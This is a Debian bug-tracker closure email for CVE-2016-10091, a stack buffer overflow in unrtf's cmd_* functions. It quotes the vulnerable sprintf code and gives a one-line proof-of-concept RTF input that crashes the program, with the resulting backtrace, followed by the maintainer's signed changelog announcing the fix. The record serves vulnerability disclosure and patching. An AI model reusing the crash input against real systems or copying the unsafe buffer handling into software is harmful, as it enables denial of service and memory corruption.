Bug#849705: marked as done (unrtf: CVE-2016-10091: stack-based buffer overflows in cmd_* functions)

Sat, 31 Dec 2016 11:51:25 -0800 

Your message dated Sat, 31 Dec 2016 19:49:28 +0000
with message-id <[email protected]>
and subject line Bug#849705: fixed in unrtf 0.21.9-clean-3
has caused the Debian Bug report #849705,
regarding unrtf: CVE-2016-10091: stack-based buffer overflows in cmd_* functions
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)


-- 
849705: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=849705
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message --- 
Package: unrtf
Version: 0.21.9-clean-2

I've found a Stack-based buffer overflow in unrtf 0.21.9, which affects three 
functions including: cmd_expand, cmd_emboss and cmd_engrave.

# convert.c

static int
cmd_expand (Word *w, int align, char has_param, int param) {
char str[10];
if (has_param) {
sprintf(str, "%d", param/4); // Overflow, 9-digit negative value triggers the 
bug
if (!param)
attr_pop(ATTR_EXPAND);
else
attr_push(ATTR_EXPAND, str);
}
return FALSE;
}

Apparently writing a negative integer to the buffer can trigger the overflow 
(Minus sign needs an extra byte).

* How to trigger the bug *

$ echo "\expnd-400000000" > poc
$ unrtf poc

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<!-- Translation from RTF performed by UnRTF, version 0.21.9 -->
*** buffer overflow detected ***: unrtf terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(+0x6737a)[0xb764f37a]
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x37)[0xb76dfe07]
/lib/i386-linux-gnu/libc.so.6(+0xf60a8)[0xb76de0a8]
/lib/i386-linux-gnu/libc.so.6(+0xf58b8)[0xb76dd8b8]
/lib/i386-linux-gnu/libc.so.6(_IO_default_xsputn+0xa6)[0xb7653bf6]
/lib/i386-linux-gnu/libc.so.6(_IO_vfprintf+0xf66)[0xb762b1d6]
/lib/i386-linux-gnu/libc.so.6(__vsprintf_chk+0x90)[0xb76dd950]
/lib/i386-linux-gnu/libc.so.6(__sprintf_chk+0x20)[0xb76dd8a0]
unrtf[0x804c7b8]
unrtf[0x804f77d]
unrtf[0x804f9e7]
unrtf[0x804920b]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7600276]
unrtf[0x804953c]
======= Memory map: ========
08048000-0805b000 r-xp 00000000 08:01 405354 /usr/bin/unrtf
0805b000-0805c000 r--p 00012000 08:01 405354 /usr/bin/unrtf
0805c000-0805d000 rw-p 00013000 08:01 405354 /usr/bin/unrtf
0805d000-08085000 rw-p 00000000 00:00 0
0952d000-0954e000 rw-p 00000000 00:00 0 [heap]
b75ca000-b75e6000 r-xp 00000000 08:01 393233 
/usr/lib/i386-linux-gnu/libgcc_s.so.1
b75e6000-b75e7000 r--p 0001b000 08:01 393233 
/usr/lib/i386-linux-gnu/libgcc_s.so.1
b75e7000-b75e8000 rw-p 0001c000 08:01 393233 
/usr/lib/i386-linux-gnu/libgcc_s.so.1
b75e8000-b7799000 r-xp 00000000 08:01 395818 
/usr/lib/i386-linux-gnu/libc-2.24.so
b7799000-b779b000 r--p 001b0000 08:01 395818 
/usr/lib/i386-linux-gnu/libc-2.24.so
b779b000-b779c000 rw-p 001b2000 08:01 395818 
/usr/lib/i386-linux-gnu/libc-2.24.so
b779c000-b779f000 rw-p 00000000 00:00 0
b77a3000-b77a6000 rw-p 00000000 00:00 0
b77a6000-b77a8000 r--p 00000000 00:00 0 [vvar]
b77a8000-b77aa000 r-xp 00000000 00:00 0 [vdso]
b77aa000-b77cc000 r-xp 00000000 08:01 393914 /usr/lib/i386-linux-gnu/ld-2.24.so
b77cc000-b77cd000 rw-p 00000000 00:00 0
b77cd000-b77ce000 r--p 00022000 08:01 393914 /usr/lib/i386-linux-gnu/ld-2.24.so
b77ce000-b77cf000 rw-p 00023000 08:01 393914 /usr/lib/i386-linux-gnu/ld-2.24.so
bf992000-bf9b3000 rw-p 00000000 00:00 0 [stack]
Aborted

* Test environment *

Linux debian 4.7.0-1-686-pae #1 SMP Debian 4.7.8-1 (2016-10-19) i686 GNU/Linux
libc6 2.24-8

Regards,
Amir


Sent with [ProtonMail](https://protonmail.com) Secure Email.

--- End Message ---
--- Begin Message --- 
Source: unrtf
Source-Version: 0.21.9-clean-3

We believe that the bug you reported is fixed in the latest version of
unrtf, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Willi Mann <[email protected]> (supplier of updated unrtf package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Sat, 31 Dec 2016 20:35:19 +0100
Source: unrtf
Binary: unrtf
Architecture: source
Version: 0.21.9-clean-3
Distribution: unstable
Urgency: high
Maintainer: Willi Mann <[email protected]>
Changed-By: Willi Mann <[email protected]>
Description:
 unrtf      - RTF to other formats converter
Closes: 849705
Changes:
 unrtf (0.21.9-clean-3) unstable; urgency=high
 .
   * Security fix
   * Add patch from upstream to fix CVE-2016-10091 (buffer overflow in various
     cmd_ functions). closes: 849705
Checksums-Sha1:
 32d22625cf8317479cf66976e3170005ff12868b 1868 unrtf_0.21.9-clean-3.dsc
 1e36bf97457303470410d775e2fd68a1ab53855d 6104 
unrtf_0.21.9-clean-3.debian.tar.xz
Checksums-Sha256:
 6e16779899ce765e8cfd015aa03b4b03fdcb84d3bb6ee935097e0943ed8842e5 1868 
unrtf_0.21.9-clean-3.dsc
 26b52467952d2a0a030908c0a44121dde69f8005af05faa6511fbf7d5a58487c 6104 
unrtf_0.21.9-clean-3.debian.tar.xz
Files:
 3556222cb8ea1f7725fffbcfca1dcf34 1868 text optional unrtf_0.21.9-clean-3.dsc
 a14a89a1c32c664c04dbfa22932a1c7e 6104 text optional 
unrtf_0.21.9-clean-3.debian.tar.xz

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCAAGBQJYaAihAAoJEIy+IZx0V22B9qgP/RETGnRixEoM4x3RJXMNB76L
XmyQ1TnQWgQNUgwKCRZ31M1sQrhQLT5PYlE1WrXufgK4CERhtIdrAyC3QZoRI9At
NqY8pGcVhyHg00ScG+404w0QKyNdh8YR1EylXLOMhQdBUY7EvnctV+S0xCWHfAIn
8cm6SdAQX1jh7PhNLpg4cDYZOFhqN//VUk5TLsxpb9N0fWRI2DR5O6zwtqmvVjWM
F2MbC4NBNnfltRwk8cA25tdT4fhfdAKeCimY1bAZsTCbkZwOBKpCd6Iy5/iPyOKv
PZEHSnbQtWKhuVs+aCizDXqFOwybEi+K2nnguMwJW90UWe7LkIHKCEHCVvYb5XR+
pa+lOFyt9wDqr8fJeyg7vvwRjN7IXLSqPb93BeqSzRu/sluy3AvDDzVTdQZQsYV+
NkbHk1fBASxmhrqHFKlMzDAy9PSIMtlv6pAwF4QXHvHxe+X0Du/B8zc6X3qTa04v
g/xL30kACknDLs87hLWHqrIMw/MUG0cXGBYCkO+LK+Qph41SiWqLORroSjTMvto8
jYtrHgI7iI9oGod8EyLMyCe9rcpJlrwaqUIO6wn6+RzubLOwb0UzMVolgzOoMoo1
LbMEdqGhlYbA+ZDRX/TMA+VfNTT9Zj+6O+0cOza0DGFTInCzR8vWTq+Si0JwWoMR
F1bh069VSeGa/iSp1Cij
=k1Dr
-----END PGP SIGNATURE-----

--- End Message ---

Reply via email to